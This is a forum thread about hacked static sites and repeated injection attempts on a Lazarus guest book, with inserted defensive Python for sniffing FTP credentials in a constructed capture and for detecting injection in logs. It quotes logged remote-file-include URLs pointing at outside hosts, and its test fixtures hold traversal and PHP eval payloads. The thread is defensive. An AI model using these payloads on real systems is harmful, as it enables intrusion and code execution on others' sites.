Code Injection Attempts linked to FTP?

#1 TechnoBear

    My hosting company won't allow me to use SFTP or FTPS, so after three of my sites were hacked, I decided to upload files only through the cpanel file manager with a secure log-in.

    Two days ago, I had quite a number of files to upload to one site, to update the guest book, so I used FTP for convenience and changed the passwords immediately afterwards. In the last 48 hours, there have been 38 code injection attempts on that site, all targeting the guest book. There were only two in the whole of the preceding two months, which makes me wonder if there is some connection here, although it's hard to see what. None of my other sites have been targeted recently, including another one on the same server.

Is this just a coincidence, do you think?

#2 eldad

    Out of curiosity, how do you track the code injection attempts?

Can it be that the guest book version you are using has a public vulnerability? A common practice for automated injection bots is to search on Google for sites with specific plugins that are known to be vulnerable (the search terms are called Google Dorks; see the Google Hacking Database, GHDB). It is their way to cover many sites but still target sites that are more likely to be vulnerable.

#3 TechnoBear

    Thanks for the information and the link.

    Quote Originally Posted by eldad View Post
    Can it be that the guest book version you are using has a public vulnerability?
    I'm pretty sure that's not the problem. I can't find anything recent regarding the guest book, and nothing major at any time. I'm using the latest version. I also have the same script installed on another site and have had no problems. On both sites I renamed the directory when I installed it (for convenience, not obfuscation) and disallowed it in my robots.txt file. I know this doesn't keep out the bad guys, but at least I'm not advertising its presence on Google.

#4 eldad

    Interesting... A lot of questions can be asked...
From what IPs did the injection attempts come? Did you see other visits from those IPs? Were the attempts from humans or bot agents? What are the injection vectors (any references online)?

#5 TechnoBear

Four different IPs, from the US, Spain, France and Bulgaria. No previous visits from those IPs in the last couple of months (I haven't checked further back). I'm not sure how to tell if they're human or bot.
    I did try looking online for more information, but couldn't find anything relevant. There were references to several other domains, but none of these flagged up anything particularly nasty at Site Advisor or elsewhere.
    This is one of the sites that was hacked previously, and on that occasion files were uploaded by FTP. I have the IP address for the previous attack and there doesn't seem to be any connection.

#6 sparek

    If you have your account password stored anywhere on your personal computer and if your personal computer is infected with spyware or malware, then it may be sending out your username and password information. It wouldn't make any difference if you are using SFTP or FTPS to connect to your FTP account, or if you used the secure cPanel link. If your password is stored in plaintext or easily breakable encryption on your local computer, that information can be harvested if you are infected with malware.

    A lot of malware will do this, just target your local computer and attempt to harvest your username and password. Then it is not relevant if your webhosting account is running an outdated and vulnerable script. Whoever gains access to your username and password has full access to your webhosting account.

#7 ParkinT

    What software product are you using to accomplish the FTP?
    Perhaps it (freeware/malware) is logging your activity and then generating the extraneous traffic you see.

    Try using FTP from the command line (Windows, Linux or Mac) and not some software WYSIWYG.

#8 TechnoBear

    There isn't, and never has been, any kind of malware on my computer, nor does anyone else have access to it or to my passwords (which are different for every site).

    I stopped using FTP because I was advised it sends the password in plain text, making it easy to intercept. Using the command line would not make things any more secure, as far as I can see.

#9 deathshadow60

    I would much more suspect the guest book itself than FTP... Though again as already asked how are you tracking "code injection attempts" -- that part alone sounds kinda fishy.

#10 Mittineague

    A guestbook is one of the reasons I got into PHP years ago.

I had been busy learning (horrid) mark-up, inline styling, animated GIFs galore and stupid JavaScript tricks for my newfound web presence.

    I wanted a guestbook so I downloaded one and put it online.

    After my site had been hacked (site, NOT guestbook) I traced it to several security flaws in the guestbook app (use of unsanitized global variables). I am now very wary of using third party apps. At times they may be intentionally malicious, other times once a vulnerability is published script-kiddies go hunting for them.

    To get to my point,
    Is the guestbook app from a trusted source?
    Are you keeping up-to-date for security fixes assuming it's maintained?

#11 TechnoBear

    Quote Originally Posted by Mittineague View Post
    To get to my point,
    Is the guestbook app from a trusted source?
    Are you keeping up-to-date for security fixes assuming it's maintained?
    The guest book was installed via cpanel using Softaculous, and as mentioned in an earlier post, is the latest version. In fact, it was the need to update the guest book that led to me using FTP a couple of days ago, because of the number of files involved. (The other site on which I have the guest book I can update using the update feature in Softaculous, but for some reason that doesn't work properly on this site.)

    I think the guest book is a red herring here. At the point when the site was hacked, there was no guest book installed. This site, and the other two that were hacked, were all small, static HTML-only sites - no PHP, no Javascript, no scripts of any kind.

#12 deathshadow60

    Quote Originally Posted by TechnoBear View Post
    The guest book was installed via cpanel using Softaculous, and as mentioned in an earlier post, is the latest version.
    Ouch and Ouch -- two things I don't trust to begin with... Generally Softascrewup is only as good as the ISP who keeps the scripts up to date -- did you use it to keep the updates or have you been updating it manually? Just exactly WHICH guestbook is it?

    Quote Originally Posted by TechnoBear View Post
    I think the guest book is a red herring here.
    Funny, your new post makes me look even HARDER at it.

    Quote Originally Posted by TechnoBear View Post
    At the point when the site was hacked, there was no guest book installed. This site, and the other two that were hacked, were all small, static HTML-only sites - no PHP, no Javascript, no scripts of any kind.
    Again, how are you 'tracking' that or knowing they were hacked... you're being a bit vague on that subject. (I'm starting to wonder if you know what a code injection IS).

#13 EastCoast

    Quote Originally Posted by TechnoBear View Post
    There isn't, and never has been, any kind of malware on my computer, nor does anyone else have access to it or to my passwords (which are different for every site).
I recall analysing a hacking issue of some websites, where eventually by painstaking research the source was tracked down to a user who had absolutely insisted the exact same thing, except Wireshark proved unequivocally that network packets with FTP logins were travelling outwards to Russia from their PC. Some of the FTP-stealing type trojans don't show up on common AV software, so don't discount the possibility if there is a genuine issue.

    It is more likely as deathshadow60 has pointed out that the guestbook is attracting the unwanted attention however, I'd check for any presence of it on exploit lists.
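
Added example (not from any post in this thread, and not Lazarus code): what the Wireshark finding above, and the "FTP sends the password in plain text" point in #8, look like at the byte level. It reassembles the client half of a constructed FTP control-channel capture and pulls out the credentials and the names of files stored, exactly as a passive sniffer on the path would. SAMPLE_CAPTURE, the user name, the password and the upload path are all made up here; the client bytes are deliberately split across segments because a capture hands you TCP payloads, not tidy lines.

```python
# Constructed FTP control-channel exchange (not a real capture). Each entry is
# (direction, raw TCP payload). The user name, password and path are invented.
SAMPLE_CAPTURE = [
    ("server", b"220 FTP server ready.\r\n"),
    ("client", b"USER example_user\r\n"),
    ("server", b"331 Password required for example_user\r\n"),
    ("client", b"PASS Tr0ub"),                      # password split across two segments
    ("client", b"4dor&3\r\n"),
    ("server", b"230 User example_user logged in\r\n"),
    ("client", b"TYPE I\r\nSTOR public_html/test.html\r\n"),   # two commands in one segment
    ("server", b"150 Opening BINARY mode data connection\r\n"),
    ("client", b"QUIT\r\n"),
]


def client_stream(capture):
    """Reassemble the client->server direction into CRLF-terminated commands.

    FTP commands are lines ending in CRLF (RFC 959), but segment boundaries fall
    anywhere, so concatenate the whole direction first and split afterwards.
    """
    data = b"".join(chunk for direction, chunk in capture if direction == "client")
    return [line.decode("latin-1") for line in data.split(b"\r\n") if line]


def extract_credentials(capture):
    """Return every (user, password) pair sent in the clear, in order."""
    creds, pending_user = [], None
    for line in client_stream(capture):
        verb, _, arg = line.partition(" ")
        verb = verb.upper()                 # FTP verbs are case-insensitive
        if verb == "USER":
            pending_user = arg
        elif verb == "PASS" and pending_user is not None:
            creds.append((pending_user, arg))
            pending_user = None
    return creds


def uploaded_paths(capture):
    """Paths the client stored (STOR/APPE): the sniffer sees what was uploaded, too."""
    return [line.partition(" ")[2] for line in client_stream(capture)
            if line.partition(" ")[0].upper() in ("STOR", "APPE")]


if __name__ == "__main__":
    print("credentials:", extract_credentials(SAMPLE_CAPTURE))
    print("uploads:", uploaded_paths(SAMPLE_CAPTURE))
```

With a real capture the same thing is one Wireshark display filter, ftp.request.command == "PASS", after capturing on tcp port 21. Over SFTP or FTPS the client direction is SSH or TLS records instead, and neither function above would find anything to extract, which is the whole argument for refusing plain FTP.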

#14 TechnoBear

    Quote Originally Posted by deathshadow60 View Post
    Ouch and Ouch -- two things I don't trust to begin with... Generally Softascrewup is only as good as the ISP who keeps the scripts up to date -- did you use it to keep the updates or have you been updating it manually?
    As I've said before, on one site I've used it to do the updates. On this site, it won't update properly via Softaculous and I've downloaded the updates from the official site.
    Quote Originally Posted by deathshadow60 View Post
    Just exactly WHICH guestbook is it?
    Lazarus Guest Book v1.15. All the directory permissions are set to 505 and the files to 404.
    Quote Originally Posted by deathshadow60 View Post
    Again, how are you 'tracking' that or knowing they were hacked... you're being a bit vague on that subject. (I'm starting to wonder if you know what a code injection IS).
    OK, I freely admit to being a novice in this area. It's one of the main reasons I joined this forum, to try to learn more about security. However, even I can spot an IP address that isn't mine in my FTP logs and a directory I didn't create in my Web space.

    I didn't post details, because I didn't think it was relevant, but as you seem to suspect I'm havering, I'll give you the details now and apologise to everybody else for the long post.

    I have a number of sites, of which three were hacked over the space of about a month. On one site, a directory called "allyn" containing a single file called "spilled.php" was added, my .htaccess file permissions were changed and the file itself was altered. The files were uploaded from 213.5.68.141, which is not my IP. I didn't notice it until a couple of weeks later, by which time Google had found around 230 supposed URLs for my site which I knew nothing about. e.g. mydomain//Auckland-volkswagen-cabrio-instrument-dashboard-symbols-warning-lights/ Most of the others are pornographic in nature. It was when one of these showed up in my AWStats that I first realised something was amiss and started to investigate further. I then checked all my other sites.

    On another site - the one referred to in my original post in this thread - a directory called "narrator" containing a single file called "sherriffs.php" was added, my .htaccess file permissions were changed and the file itself was altered. The files were uploaded from 213.5.69.27, which is also not my IP. I discovered this one the day after it was hacked and removed the directory immediately. Two days later, this appeared in the logs:
Url: /narrator/sherrifs.php?sheme=157&redirect=http%3A%2F%2Fsecureweblogs.net%2Fstat%2Fcheck%2Fweb.php&dgen=http%3A%2F%2Fsecurecheck3.net%2Fgenerator_root_image%2Fgenerator.php&secvalue=5978197fcdec1d5de383c1b5f3431c41&cached=true&remove_file=true 95.168.165.98
    Again, the IP address is not mine.

The third site had four files added to the cgi-bin. I don't know exactly when or how, as there are no entries in the FTP logs apart from my own visits. The files added were:
    cgiecho
    randhtml.cgi
    entropybanner.cgi
    cgiemail
    I have no idea what they did or were meant to do, as I couldn't read them i.e. the characters were displaying largely as boxes, as if in an unknown font. I had never had cause to use the cgi-bin and would probably never have discovered these had I not been scrutinizing everything after I found the first hack.

    As I mentioned before, at this point all these sites consisted of nothing but static html pages.

    My hosting company was not helpful, insisting any problem must originate at my end. A friend recommended Crawl Protect, which I have since been using on all my sites. I have found it surprisingly difficult to find beginners' security information on the Web, which again brings me back to this forum.

    The 38 code injection attempts I mentioned are reported by Crawl Protect and logged as
    Url: /guestbook.php//admin.php?include_path=http://sebri.net/templates/osCommRes/images/allnet.jpg?? 12.185.242.246
    Url: /guestbook.php/admin.php?include_path=http://ztrackonline.com/images/tmp/x/sangatta.txt?? 94.23.83.227
    Url: /guestbook.php//admin.php?include_path=http://www.yuriamorim.com//includes/domit/Z6.txt?? 87.120.106.5
    Url: /guestbook.php/admin.php?include_path=http://ztrackonline.com/images/tmp/x/parepare.txt?? 213.251.135.16
    etc etc. Need I mention that none of those IPs is mine?
    Quote Originally Posted by EastCoast View Post
    I recall analysing a hacking issue of some websites, where eventually by painstaking research the source was tracked down to a user who had absolutely insisted the exact same thing, except wireshark proved unequivocally that network packets with ftp logins were travelling outwards to russia from their pc Some of the ftp stealing type trojans don't show up on common av software, so don't discount the possibility if there is a genuine issue.
    I do realise that is the obvious problem. However, I'm running a Linux PC with all updates done. I don't use wi-fi, it isn't on a network and no-one else has access to it. Apart from a few well-known Firefox add-ons downloaded from Mozilla, there is nothing installed on this machine that didn't come from the official repositories. Nevertheless, I have scanned it (repeatedly) with ClamAV and found nothing. If you can suggest any further precautions I can take, I should be grateful.

    Also, one site was hacked the day after I used FTP to upload files, but the other was hacked nearly three weeks after I'd last accessed it. Is it normal for hackers to wait that long after intercepting a password and risk it being changed?

    Quote Originally Posted by EastCoast View Post
    It is more likely as deathshadow60 has pointed out that the guestbook is attracting the unwanted attention however, I'd check for any presence of it on exploit lists.
    I tried looking for that kind of information before I installed it and couldn't find any, which I took to be a good sign. Perhaps I'm missing something, but it seems OK and I've never had any problems with the other site, where the guestbook has been installed slightly longer.

    Again, my apologies for a very long post.
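
Added example (not from the thread, and not Crawl Protect's code): detection logic for the kind of entries quoted in the post above. It reads lines in the same "Url: <path> <client ip>" shape, URL-decodes the query string and flags any parameter whose value is itself a URL, which is the signature of a remote-file-include attempt; it counts attempts per source IP as well. The first three sample lines reuse the hostnames from the thread; the last two are constructed here (RFC 5737 test addresses) to give a benign request and an ftp:// include.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# Constructed sample log in the Crawl Protect "Url: <path> <ip>" shape.
SAMPLE_LOG = """\
Url: /guestbook.php//admin.php?include_path=http://sebri.net/templates/osCommRes/images/allnet.jpg?? 12.185.242.246
Url: /guestbook.php/admin.php?include_path=http://ztrackonline.com/images/tmp/x/sangatta.txt?? 94.23.83.227
Url: /narrator/sherrifs.php?sheme=157&redirect=http%3A%2F%2Fsecureweblogs.net%2Fstat%2Fcheck%2Fweb.php&cached=true 95.168.165.98
Url: /guestbook.php?page=2 203.0.113.9
Url: /guestbook.php/admin.php?include_path=ftp://198.51.100.7/x.txt 198.51.100.7
"""

LINE_RE = re.compile(r"^Url:\s+(?P<url>\S+)\s+(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s*$")
# A parameter value that is itself a URL is what a remote-file-include attempt looks
# like: PHP's include() fetches it when the script passes the value through unchecked
# and the configuration allows URL includes (allow_url_include, or allow_url_fopen
# alone on PHP older than 5.2).
REMOTE_RE = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)


def parse_line(line):
    """Split one log line into (url, client_ip), or None if it is not in that shape."""
    m = LINE_RE.match(line)
    return (m.group("url"), m.group("ip")) if m else None


def remote_params(url):
    """Return (name, value) pairs whose decoded value points at a remote resource.

    parse_qsl URL-decodes, so the %3A%2F%2F form in the sherrifs.php hit is caught as
    well as the literal http:// form. The trailing '??' on the guestbook hits is
    deliberate on the attacker's side: whatever the script appends to the variable
    (a file name or extension) lands in the query string of the attacker's URL
    instead of breaking the include.
    """
    query = urlsplit(url).query
    return [(n, v) for n, v in parse_qsl(query, keep_blank_values=True) if REMOTE_RE.match(v)]


def analyze(log_text):
    """Flag RFI attempts; return the findings and a per-source-IP count."""
    findings, by_ip = [], Counter()
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue
        url, ip = parsed
        hits = remote_params(url)
        if hits:
            findings.append({"ip": ip, "path": urlsplit(url).path, "params": hits})
            by_ip[ip] += 1
    return findings, by_ip


if __name__ == "__main__":
    found, counts = analyze(SAMPLE_LOG)
    for f in found:
        print(f["ip"], f["path"], f["params"])
    print("attempts per IP:", dict(counts))
```

The same check runs unchanged over an Apache access log once the request path and client address are pulled out of each line, and it does not depend on knowing the vulnerable script's name, so it would have flagged the sherrifs.php callback as readily as the admin.php probes.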

#15 deathshadow60

Can't say I've heard of Lazarus, but poking my head into its admin.php (which seems to be drawing the most attention)
    Code:
// Emulates register_globals: every GET, POST and cookie field becomes a
// global variable named after the field ($$name = $value), so a request can
// overwrite any variable the script uses, not just the ones it expects.
// each() is deprecated since PHP 7.2 and removed in PHP 8.
if (!isset($PHP_SELF)) 
{
  $PHP_SELF = $_SERVER['PHP_SELF'];
  if (isset($_GET)) 
  {
    while (list($name, $value) = each($_GET)) 
    {
      $$name = $value;   // variable variable: request field name becomes the variable name
    }
  }
  if (isset($_POST)) 
  {
    while (list($name, $value) = each($_POST)) 
    {
      $$name = $value;
    }
  }
  if (isset($_COOKIE)) 
  {
    while (list($name, $value) = each($_COOKIE)) 
    {
      $$name = $value;
    }
  }
}
    *SIGH*... EVERY time I see this type of idiotic code my brain goes "WHAT THE HELL ARE THEY DOING?!?" -- be real fun to pass it something like admin.php?_SERVER

    Sure, they have this fix after:
    Code:
// Deny-list check on the one variable name the published exploit used;
// any other injected global still passes through.
if (isset($include_path))
{
  die("Hacking Attempt!");
}
    That's bubblegum on a leaky bike tire instead of using a real patch or replacing the tube... Though that explains your log entries as that's just bots trying to use a known exploit that's been patched. Of course christmas only knows how bad the entire server was pwned before it was patched -- especially since it sounds like you're on shared hosting, so if someone else is still running unpatched you could still get pwned.

    Eval for the templates? Blindly trusting global vars? EVERYTHING in global scope? Total pwnage.
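
Added example (not Lazarus code and not from the thread): a Python model of the pattern quoted in the post above, to make the "bubblegum" point concrete. `scope` stands in for PHP's global symbol table, `request` for the merged $_GET/$_POST/$_COOKIE, and the config names template_dir and is_admin are hypothetical. It shows a request that the `include_path` deny list waves through while it rewrites two configuration variables, next to an allow-list extractor that only reads declared, validated parameters and never lets request data choose a variable name.

```python
# Model of the register_globals emulation quoted above; not Lazarus code.
# `scope` stands in for PHP's global symbol table. template_dir and is_admin
# are hypothetical config variables used only to show what gets overwritten.

DEFAULT_SCOPE = {
    "PHP_SELF": "/admin.php",       # what the PHP snippet itself sets
    "template_dir": "templates",    # hypothetical: a path the script later includes
    "is_admin": False,              # hypothetical: an authorization flag
}


def register_globals_emulation(scope, request):
    """The quoted loop: `$$name = $value` for every request field, no questions asked."""
    scope = dict(scope)
    for name, value in request.items():
        scope[name] = value         # a request field silently replaces a config value
    return scope


def deny_list_check(scope, blocked=("include_path",)):
    """The 'Hacking Attempt!' patch: refuses only the name the published exploit used."""
    return not any(name in scope for name in blocked)


# Allow-list alternative: declare every parameter the script expects, validate each
# one, and keep the result in its own dict instead of the global scope.
PARAM_SCHEMA = {
    "page": lambda v: int(v) if v.isdigit() else None,    # digits only -> int
    "show": lambda v: v if v.isalnum() else None,          # no path or URL characters
}


def extract_allowed(request, schema=PARAM_SCHEMA):
    """Return only declared, validated parameters; unknown names are ignored."""
    params = {}
    for name, validate in schema.items():
        if name in request:
            value = validate(request[name])
            if value is None:
                raise ValueError(f"rejected value for {name}: {request[name]!r}")
            params[name] = value
    return params


def demo():
    """A request the deny list accepts but that rewrites config under the old code."""
    request = {"template_dir": "http://attacker.invalid/tpl", "is_admin": "1"}
    polluted = register_globals_emulation(DEFAULT_SCOPE, request)
    return {
        "deny_list_passes": deny_list_check(polluted),   # True: include_path not present
        "template_dir": polluted["template_dir"],        # now attacker-controlled
        "is_admin": bool(polluted["is_admin"]),          # "1" is truthy, in PHP as well
        "allow_list_params": extract_allowed(request),   # {}: both names simply ignored
    }


if __name__ == "__main__":
    print(demo())
```

The deny list is a patch for one exploit string; the allow list closes the class, because the request can no longer name a variable at all. The same distinction applies to any "mass assignment" style of binding request data to application state, not only to PHP.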

#16 sparek

    An FTP hack and a script hack are two completely different animals.

    If someone is uploading material via FTP that are not authorized by you, then this means someone has access to your webhosting login information. How they got that information is unknown. Usually this means that you have malware running on your computer, either searching through the files on your computer for anything that would mention your username and password (an email, an FTP site manager, etc) or you have a packet sniffer installed on your computer, or perhaps somewhere on your network.

    Since you said you are running Linux, I would think this would minimize the malware threat. I'm not aware of any such malware like this that runs on Linux, but that doesn't mean Linux is infallible.

    Are there other computers that have your login information stored on them? Perhaps one of those computers is infected.

What some people don't realize is that their own computer can be completely safe and completely free of any virus or malware. But if you log into your account from a public wifi hotspot, or at a public library, or anywhere else, the security of those areas has to be called into question. Your computer might be safe, but if you access your FTP account from a library terminal that is infected with malware, then that can steal your information.

    A script hack means that an outside visitor, someone accessing your website from the Internet, has taken advantage of a security hole in a script on your account.

From what you have posted in the logs, it looks like someone is trying to exploit your guestbook using the admin.php remote file include exploit (CVE-2007-1486), which was fixed in version 1.7.3. The information you posted from the logs just shows that they are attempting to exploit this. It doesn't necessarily mean that they are successful. If you are using version 1.15, you should be clear of this exploit. But again, this doesn't mean that there isn't another exploit in the script, but I don't see anything being disclosed. Lazarus Guestbook is up to version 1.16 but it is in beta, so 1.15 should be safe of any KNOWN threats.

    The only time these two types of exploits can be combined is if you have a script vulnerability that allows a malicious user to read the files on your webhosting account. And if you are using the same username and password in your script's config files for MySQL access as your main webhosting account login, then those malicious users can steal that information and then log in via FTP.

    You haven't stated if you are using cPanel or not. I come from a cPanel background, so I will use it as an example. This may not apply to you if you are not using cPanel.

    If you have a config file for your script and if the script uses MySQL databases. If, in that config file, you use your main FTP username and password, then a malicious user that exploits the vulnerability in your script (assuming that a script on your account is vulnerable), then that person can read this information and then access your account via FTP. Because all that is needed for FTP access is a hostname (your domain name, which they obviously know) and a username and password (which was stolen from the config file).

    With cPanel you can create separate MySQL username and assign them passwords. The MySQL username that is created will have your main username appended to it (in order to keep MySQL usernames unique in a shared hosting environment) so if you create a new username, but reuse your same password, then again all of this information is made available to the malicious user that exploited your site.

    Bottom line, always use a MySQL user for accessing your MySQL database, and never reuse your main account password.

    Worth mentioning, the config file routine is not the only way a malicious user can glean information. If a malicious user gains access to reading the files on your webhosting account through a script vulnerability, then they could conceivably read any email that might also be stored on your webhosting account. If your login information is stored there, then again this information can be stolen.

    I would be more concerned with how these IP addresses are getting your FTP information to log into your account. I assume you are using a strong password, something that is not hard to guess, in that case you have a vulnerability somewhere. Either on your computer, on a computer, or in a script on your website. You would immediately need to change your password, and tell nobody what the new password is. Don't log into your account from any other computer, and note if you have to change any configuration files because of this updated password. If your FTP account is compromised again, then this will help narrow down which computer or which system is vulnerable.

    It is possible, although highly unlikely, that your webhosting provider has been hacked and someone may have root access on the server. I say unlikely because your host should be seeing a number of infected websites on their server if they have been rooted. And generally a rooted server is not used to upload malicious links like you have stated. If someone has root access on a server, then they can do anything to that server, including deleting everything.

#17 Crazybanana

As the Lazarus guestbook has been known for several flaws (like the remote XSS attack, allowing a user to create a specially crafted URL to execute arbitrary code, or to inject arbitrary script or HTML via the show parameter or img parameter after the name of an existing file), there are a few other vulnerabilities that may help an attacker to steal cookie-based authentication credentials and launch other attacks. So there you have several input validation and several input manipulation vulnerabilities.

    In other words: the kids know about these previous vulnerabilities, and are trying to exploit 'em...

    But as sparek told ya, with 1.15 you should be safe for any known threats

They probably used a vulnerability scanner, and maybe they posted the result log for others to have fun... maybe your site(s) are listed as vulnerable on some forums etc., because of the previous hack.

    If everything is running the latest version/patches this may go away on its own - but I would monitor it anyway to keep an eye on whats going on

#18 TechnoBear

    Thanks, guys, for the replies and helpful information.

    Quote Originally Posted by sparek View Post

    Since you said you are running Linux, I would think this would minimize the malware threat. I'm not aware of any such malware like this that runs on Linux, but that doesn't mean Linux is infallible.

    Are there other computers that have your login information stored on them? Perhaps one of those computers is infected.
    I only ever log in from my own computer, which is a PC not a laptop and therefore only connects through my own ethernet modem and never a public wi-fi. It is not - and never has been - on any kind of network.
    Quote Originally Posted by sparek View Post
From what you have posted in the logs, it looks like someone is trying to exploit your guestbook using the admin.php remote file include exploit (CVE-2007-1486), which was fixed in version 1.7.3. The information you posted from the logs just shows that they are attempting to exploit this. It doesn't necessarily mean that they are successful. If you are using version 1.15, you should be clear of this exploit. But again, this doesn't mean that there isn't another exploit in the script, but I don't see anything being disclosed. Lazarus Guestbook is up to version 1.16 but it is in beta, so 1.15 should be safe of any KNOWN threats.
    Thanks. That's helpful and fairly reassuring.
    Quote Originally Posted by sparek View Post
    The only time these two types of exploits can be combined is if you have a script vulnerability that allows a malicious user to read the files on your webhosting account. And if you are using the same username and password in your script's config files for MySQL access as your main webhosting account login, then those malicious users can steal that information and then log in via FTP.
    Oh dear - I confess I'd never thought of that, although now it seems pretty obvious.
    Quote Originally Posted by sparek View Post
    You haven't stated if you are using cPanel or not.
    I am.
    Quote Originally Posted by sparek View Post
    If you have a config file for your script and if the script uses MySQL databases. If, in that config file, you use your main FTP username and password, then a malicious user that exploits the vulnerability in your script (assuming that a script on your account is vulnerable), then that person can read this information and then access your account via FTP. Because all that is needed for FTP access is a hostname (your domain name, which they obviously know) and a username and password (which was stolen from the config file).
    Well, I've just had a wee panic and looked at the database and the config file. The MySQL username is the same as the database name and the password is pretty strong and is not the same as the main account password. As these are the default settings, I can only assume Lazarus is brighter than I am!
    Quote Originally Posted by sparek View Post
    With cPanel you can create separate MySQL username and assign them passwords. The MySQL username that is created will have your main username appended to it (in order to keep MySQL usernames unique in a shared hosting environment) so if you create a new username, but reuse your same password, then again all of this information is made available to the malicious user that exploited your site.

    Bottom line, always use a MySQL user for accessing your MySQL database, and never reuse your main account password.
    Thank you. I'll remember that in future.
    Quote Originally Posted by sparek View Post
    Worth mentioning, the config file routine is not the only way a malicious user can glean information. If a malicious user gains access to reading the files on your webhosting account through a script vulnerability, then they could conceivably read any email that might also be stored on your webhosting account. If your login information is stored there, then again this information can be stolen.
    Again, that's something I hadn't thought about, although it's not a problem here. All admin e-mails for my various domains are sent to an e-mail address which is not associated with any of them.

    Quote Originally Posted by sparek View Post
    I would be more concerned with how these IP addresses are getting your FTP information to log into your account. I assume you are using a strong password, something that is not hard to guess, in that case you have a vulnerability somewhere.
    That has been concerning me, too. As I say, the sites were hacked over a period of about a month. I was away for some of this time, or I might have picked up on it sooner. As soon as I discovered the problem, I changed all the passwords for all my sites (not just those that were hacked) and haven't had any further problems. The passwords were all strong - mixed case, letters and numbers - and since I changed them, they now contain symbols, too. I never re-use old passwords and each account has a different password.

If I log into my cPanel using mydomain/cpanel, as advised by the hosting company, it resolves to port 2082, which is not secure. I hadn't noticed this at first (oops again), but since the hacks I've been very careful to log in using mydomain:2083, which uses https.

    Quote Originally Posted by Crazybanana View Post
    In other words: the kids know about these previous vulnerabilities, and are trying to exploit 'em...

    But as sparek told ya, with 1.15 you should be safe for any known threats
    Thanks again for the reassurance. I know I've been getting paranoid.
    Quote Originally Posted by Crazybanana View Post
    They probably used a vulnerability scanner, and maybe they postet the result log for others to have fun... maybe your site(s) listed as vulnerable on some forums etc ,because of the previous hack
    Until recently, I had no idea such forums even existed. What a sheltered life I've led!
    Quote Originally Posted by Crazybanana View Post
    If everything is running the latest version/patches this may go away on its own - but I would monitor it anyway to keep an eye on what's going on
    Since I started this thread, there have been another 34 attempts, much the same as before although from different IPs/countries. (Again, nothing targeting my other Lazarus guest book.) I find this really bizarre, not least because the site in question is a small local business, with only a handful of visitors per day and a couple of dozen inlinks, so I'm amazed that anybody has found it. The guestbook wasn't on it when it was hacked.

    Thanks again for the replies.
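    The attempts described in the post above are the kind of thing that shows up in the site's raw access log. The script below is an editor's example added to this thread; it is not code from the thread, from cPanel or from the Lazarus guest book. It parses a handful of constructed Apache combined-format lines (invented traffic, with addresses from the documentation IP ranges), flags requests whose query string carries a remote-file-inclusion URL, a directory-traversal sequence, a null byte or PHP code, and tallies the hits by source IP and by target script. The signature list is a starting point, not a complete one, and a POST body never appears in the access log, so an entry injected through the guest-book form itself would need the application's own logging to catch.

```python
"""Flag code-injection attempts in a web access log and tally them by source.

Editor's example. The log lines below are constructed in Apache combined
format (not real traffic; IPs are from the documentation ranges).
"""
import re
from collections import Counter
from urllib.parse import unquote_plus

SAMPLE_LOG = """\
203.0.113.7 - - [12/Jul/2011:10:02:11 +0100] "GET /guestbook/index.php?page=http://evil.example/shell.txt? HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.23 - - [12/Jul/2011:10:05:40 +0100] "POST /guestbook/add.php HTTP/1.1" 200 812 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Jul/2011:10:06:02 +0100] "GET /guestbook/index.php?page=../../../../etc/passwd%00 HTTP/1.1" 404 231 "-" "libwww-perl/5.8"
192.0.2.44 - - [12/Jul/2011:11:15:09 +0100] "GET /index.php HTTP/1.1" 200 4021 "-" "Mozilla/5.0"
192.0.2.99 - - [12/Jul/2011:11:20:33 +0100] "GET /guestbook/index.php?name=%3C%3Fphp%20eval(base64_decode($_GET[c]))%3F%3E HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

# Apache "combined" log format: ip ident user [time] "METHOD target PROTO" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Signatures are matched against the URL-decoded request target. This list is
# deliberately small; extend it for the application you are watching.
SIGNATURES = [
    ("remote_file_inclusion", re.compile(r"=\s*(?:https?|ftp)://", re.I)),
    ("path_traversal", re.compile(r"(?:^|[/\\=&])\.\.(?:/|\\)")),
    ("null_byte", re.compile(r"\x00")),
    ("php_code", re.compile(
        r"<\?php|\b(?:eval|system|passthru|shell_exec|assert)\s*\(|base64_decode", re.I)),
]


def classify(target: str) -> list:
    """Return the names of the signatures that match a request target."""
    decoded = unquote_plus(target)
    # Decode a second time: scanners often double-encode to slip past naive filters.
    decoded = unquote_plus(decoded)
    return [name for name, rx in SIGNATURES if rx.search(decoded)]


def analyze(log_text: str) -> dict:
    """Parse a combined-format log and summarise the requests that look like injection attempts."""
    hits = []
    unparsed = 0
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            unparsed += 1
            continue
        labels = classify(m["target"])
        if labels:
            hits.append({
                "ip": m["ip"],
                "time": m["time"],
                "method": m["method"],
                "path": m["target"].split("?", 1)[0],  # script hit, query string dropped
                "status": m["status"],
                "labels": labels,
            })
    return {
        "hits": hits,
        "by_ip": Counter(h["ip"] for h in hits),
        "by_path": Counter(h["path"] for h in hits),
        "unparsed": unparsed,
    }


if __name__ == "__main__":
    report = analyze(SAMPLE_LOG)
    for h in report["hits"]:
        print(f"{h['ip']:15s} {h['time']} {h['method']} {h['path']} -> {', '.join(h['labels'])}")
    print("attempts by source IP:", dict(report["by_ip"]))
    print("attempts by script:   ", dict(report["by_path"]))
```

    To run it over a real log, pass the file's contents to analyze() instead of SAMPLE_LOG and check the "unparsed" count: a non-zero value usually means the host writes a different log format and the regular expression needs adjusting before the tallies can be trusted.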

  19. #19 rageh (SitePoint Guru; London, formerly Somalia; joined Apr 2006; 612 posts)
    Quote Originally Posted by TechnoBear View Post
    My hosting company won't allow me to use SFTP or FTPS, so after three of my sites were hacked, I decided to upload files only through the cpanel file manager with a secure log-in.

    Two days ago, I had quite a number of files to upload to one site, to update the guest book, so I used FTP for convenience and changed the passwords immediately afterwards. In the last 48 hours, there have been 38 code injection attempts on that site, all targeting the guest book. There were only two in the whole of the preceding two months, which makes me wonder if there is some connection here, although it's hard to see what. None of my other sites have been targeted recently, including another one on the same server.

    Is this just a co-incidence, do you think?
